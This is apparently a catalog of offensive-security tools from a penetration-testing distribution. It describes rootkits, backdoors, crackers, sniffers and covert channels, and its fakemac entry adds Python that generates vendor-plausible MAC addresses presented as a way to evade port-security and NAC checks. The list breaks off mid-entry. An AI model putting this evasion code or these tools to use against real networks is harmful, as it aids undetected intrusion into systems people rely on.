   DevNull Rootkit v0.9 - Linux rootkit, modified login, chsh, chfn and su. 
   Our login, when in place, will not show the defined user logged into the 
   system, nor log the connection origin

_root_040.zip
   Windows NT Rootkit v0.04 alpha - Hides processes, files, directories, has 
   k-mode shell using TCP/IP - you can telnet into rootkit from remote. Hides 
   registry keys - (keyboard patch disabled in this build.) Includes execution 
   redirection.

allinone.c
   Allinone.c is a backdoor which combines an HTTP server, a sockets transmit
   server, a shell backdoor, an ICMP backdoor, a bind-shell backdoor and an
   HTTP shell; it can copy files from a remote host and can use a SOCKS5 proxy

cb-r00tkit.tgz
   A rootkit which backdoors quite a few things, wipes logs, etc

dica.tgz
   Dica is a rootkit found in the wild. Looks like a t0rn variant

fbrk1-imps.tar.gz
   FreeBSD rootkit. Patches ls, du, find, locate, ps, top, strings, ifconfig, 
   netstat, login, and ftpd. Includes backdoor sysback and sniffer zxsniff

fbsd.tgz
   FreeBSD rootkit precompiled binaries for 4.2-RELEASE.

flea.tar.gz
   FLEA is a linux rootkit for all distributions

login.tgz
   login package for linux - backdoored.

lrk5.src.tar.gz
   Linux Rootkit 5 - Recent release of the famous linux rootkit. Contains 
   backdoored versions of chfn, chsh, crontab, du, find, ifconfig, inetd, 
   killall, linsniffer, login, ls, netstat, passwd, pidof, ps, rshd, syslogd, 
   tcpd, top, sshd, and su. Also comes with bindshell, fix, linsniffer, 
   thesniff, sniffchk, wted, and z2. Changes: sshd-2.0.13 patch, a better 
   sniffer, a backdoored su, and better crontab. Warning: This software causes 
   anti-virus false positives.

tk.tgz
   Torn Kit is a linux rootkit which has been optimized for linux/x86 mass 
   installation. It is the first rootkit which uses precompiled binaries yet 
   still allows a user defined password. This code is being widely used to 
   automatically compromise hosts which have the wu.ftpd and rpc.statd 
   vulnerabilities, and was mentioned in CERT's recent Incident Note 
   IN-2000-10 advisory

udp-remote-final.tar.gz
   This utility demonstrates a simple udp backdoor which allows for remote 
   program execution on a Unix server

wu-ftpd-2.6.2-backdoored.gz
   Wuftpd 2.6.2 backdoored

zappa 0.1beta
   'zappa' is an advanced backdoor, which doesn't listen on a TCP-port for
   clients, further it waits for a special ICMP-packet and then it 'connects'
   to an UDP-server on the 'client'.

cd00r
   'cd00r.c' is a proof of concept code to test the idea of a 
   completely invisible (read: not listening) backdoor server. 

hxdef100.zip
   Hacker Defender - This is the Hacker Defender rootkit for Windows. This 
   is more of a 'blackhat' tool than a training example.

rk_044.zip
   NT Rootkit - The original and first public NT ROOTKIT - has not been 
   updated for many years but is good for ideas.

FU_Rootkit.zip
   The FU rootkit can hide processes, elevate process privileges, fake out 
   the Windows Event Viewer so that forensics is impossible, and even 
   hide device drivers (NEW!) All this without any hooking.

vanquish-0.2.0.zip 
   Vanquish is a DLL injection based Romanian rootkit that hides files, 
   folders, registry entries and logs passwords.

        
Tools/
wepwedgie-010
Alpha-0.1.0
Package Directory: /opt/Operator_Extras/Tools/wepwedgie-010


WEPWedgie is a toolkit for determining 802.11 WEP keystreams and injecting
traffic with known keystreams. The toolkit also includes logic for firewall
rule mapping, ping scanning, and port scanning via the injection channel and a
cellular modem.
        
Tools/
lcrack
20030404
Package Directory: /opt/Operator_Extras/Tools/lcrack


lcrack Description:

Lepton's Crack is a generic password cracker, easily customizable with
a simple plug-in system. It can perform a dictionary-based (wordlist)
attack, as well as a brute-force (incremental) password scan.

For the incremental scan, the user can provide a regex-like expression
that will be enumerated, thus checking every possible combination. This
powerful feature effectively combines `shoulder-surfing' with standard
brute-forcing.

By default it comes with the following modules:

        * md4  : standard MD4 hash
        * md5  : standard MD5 hash
        * nt4  : NT MD4/Unicode
        * dom  : Lotus Domino HTTP password
        * sha1 : standard SHA-1 hash
        * null : trivial 1-byte hash
                 (sample for plug-in developers :)

        
Tools/
fakemac-01
0.1
Package Directory: /opt/Operator_Extras/Tools/fakemac-01


Changes MAC address to a randomly generated address using a vendor MAC
file to supply the 3-byte vendor portion of the MAC address.
The vendor MAC file is the same file used in the ethereal installation.
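
What fakemac does with that vendor file, as an added example that is not
fakemac's own code: the Python below parses an Ethereal-style manuf file,
picks a random OUI from it and fills the remaining three bytes with random
values, keeping the I/G (multicast) and U/L (locally administered) bits clear
so the result looks like a factory-assigned address. The manuf excerpt is
constructed; the file layout ('prefix<TAB>short name', '#' comments, longer
prefixes written with /NN) is assumed from the Ethereal/Wireshark format.

```python
import random
import re
from typing import Dict, Optional

MAC_RE = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$")


def parse_manuf(text: str) -> Dict[str, str]:
    """Map 'XX:XX:XX' OUIs to vendor names from manuf-style text.

    Prefixes longer than 24 bits ('.../28', '.../36') are skipped: a random
    NIC part would have to respect the longer prefix to stay plausible.
    """
    ouis: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()     # drop comments
        if not line:
            continue
        fields = line.split("\t")
        prefix = fields[0].upper()
        if "/" in prefix or prefix.count(":") != 2:
            continue
        ouis[prefix] = fields[1] if len(fields) > 1 else ""
    return ouis


def is_plausible(mac: str) -> bool:
    """Well-formed, unicast and globally administered (low two bits of the
    first byte clear), i.e. what a real vendor-assigned address looks like."""
    if not MAC_RE.match(mac):
        return False
    return int(mac[:2], 16) & 0x03 == 0


def random_mac(ouis: Dict[str, str], rng: Optional[random.Random] = None) -> str:
    """Random MAC whose first three bytes are a vendor OUI from the table."""
    rng = rng or random.SystemRandom()
    oui = rng.choice(sorted(ouis))          # sorted: reproducible with a seeded rng
    nic = [rng.randrange(256) for _ in range(3)]
    mac = f"{oui}:{nic[0]:02X}:{nic[1]:02X}:{nic[2]:02X}"
    assert is_plausible(mac), mac           # vendor OUIs never set I/G or U/L
    return mac


# Constructed excerpt in the format of Ethereal's manuf file.
SAMPLE_MANUF = """\
# Ethernet vendor codes (constructed excerpt)
00:00:0C\tCisco\t# Cisco Systems, Inc.
00:03:93\tApple\t# Apple Computer, Inc.
00:50:56\tVMware\t# VMware, Inc.
00:1B:C5:00:00:00/36\tConverg\t# longer prefix, skipped
08:00:20\tSun\t# Sun Microsystems, Inc.
"""

if __name__ == "__main__":
    print(random_mac(parse_manuf(SAMPLE_MANUF)))
```

Applying the result is a separate step (on a modern Linux, `ip link set dev
eth0 address <mac>` with the interface down; an assumption about the host, not
part of the block). Keeping the I/G and U/L bits clear is the difference
between an address that blends in and one a port-security or NAC check can
single out as locally administered.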

        
Tools/
DefaultPasswordList
N/A
Package Directory: /opt/Operator_Extras/Tools/DefaultPasswordList


The Default Password List is a collection of accounts and passwords that are, 
by default, the initial passwords for specific accounts on a given computer 
system. Sometimes these passwords are installed out-of-box, sometimes they are 
automatically installed by software, and sometimes they are installed by 
consultants that are brought in to perform services. This list should be used 
as a resource for computer security consultants interested in testing the 
security configuration of equipment.

        
Tools/
ncovert-10
1.0
Package Directory: /opt/Operator_Extras/Tools/ncovert-10


NCovert 1.0  - NMRC Covert Channel
Simple Nomad

A file transfer system that uses the TCP protocol to covertly move data from
one system to another. NCovert has two flavors - one with more flexibility
to bounce the data around, and one that is a little more stealthy in hiding
the transmission (it looks like a port scan on a sniffer!)

        
Tools/
smbproxy-10
1.0
Package Directory: /opt/Operator_Extras/Tools/smbproxy-10


SMBProxy is a "Passing The Hash" tool that works as a proxy.
It makes it possible to authenticate to a Windows NT4/2000
server knowing only the MD4 (NT) hash of the password. It also makes it
possible to mount shares, access the registry and do anything
else that particular user's privileges allow.

        
Tools/
PHoss-0113
0.1.13
Package Directory: /opt/Operator_Extras/Tools/PHoss-0113


PHoss is a sniffer designed to find HTTP, FTP, LDAP, Telnet, IMAP4 and POP3
logins on the wire. It also sniffs the VNC challenge/response handshake.
Hard to find and has great effect!
        
Tools/
apsr-017
0.17
Package Directory: /opt/Operator_Extras/Tools/apsr-017


APSR is a network testing tool, designed to send and receive arbitrary network
packets.  It can be used to test firewalls, routing, security and many other
things. The project is split into two main programs, apsend to create
packets and aprecv to sniff packets.
The main goal of the APSR project is to develop a high quality network testing
tool.

        
Tools/
nmbping
1.0
Package Directory: /opt/Operator_Extras/Tools/nmbping


nmbping
   This tool can be used to find all systems running NetBIOS services on your
   network. It has the ability to determine whether the system is running Samba
   or a Windows® variant. This is a quick way to find systems which may be
   vulnerable to the Samba® vulnerabilities covered in advisory DDI-1013

   http://www.digitaldefense.net/labs/securitytools.html
        
Tools/
LdapMiner
beta
Package Directory: /opt/Operator_Extras/Tools/LdapMiner


Ldapminer by Sacha Faust : sacha@smugline.net
---------------------------------------------

This is a tool I wrote to collect information from different LDAP server
implementations.
This was written in C with the Netscape C LDAP SDK.

This is beta software and I am in the process of creating a decent environment
to continue adding functionality to it. If you wish to contribute to this
project, e-mail me at sacha@smugline.net . If you compile this on other
operating systems, please send me the makefile and modifications if necessary.
The software currently has specific checks for Microsoft Exchange server and
Netscape Directory server, more to come.


        
Tools/
packit
0.7
Package Directory: /opt/Operator_Extras/Tools/packit


Packit is a network auditing tool. Its value is derived from its ability
to customize, inject, monitor, and manipulate IP traffic. By allowing you
to define (spoof) all TCP, UDP, ICMP, IP, ARP, RARP and Ethernet
header options, Packit can be useful in testing firewalls, intrusion
detection systems, port scanning, simulating network traffic and general
TCP/IP auditing. Packit is also an excellent tool for learning TCP/IP.
        
Tools/
burpproxy_v122
1.22
Package Directory: /opt/Operator_Extras/Tools/burpproxy_v122


Burp proxy is an interactive HTTP/S proxy server for attacking and debugging 
web-enabled applications. It operates as a man-in-the-middle between the 
end browser and the target web server, and allows the user to intercept, 
inspect and modify the raw traffic passing in both directions.

Burp proxy allows an attacker to find and exploit application vulnerabilities 
by monitoring and manipulating critical parameters and other data transmitted 
by the application. By modifying browser requests in various malicious ways, 
burp proxy can be used to perform attacks such as SQL injection, cookie 
subversion, privilege escalation, session hijacking, directory traversal 
and buffer overflows.
        
Tools/
stegtunnel-04
0.4
Package Directory: /opt/Operator_Extras/Tools/stegtunnel-04


Stegtunnel provides a covert channel in the IPID and sequence number fields of 
any desired TCP connection. It requires the server and client to have a 
previously shared secret in common to detect and decrypt the data. You don't 
have to worry about the connections looking unlike real TCP connections, 
because they are real connections, just with extra info in certain fields.
        
Tools/
john-1637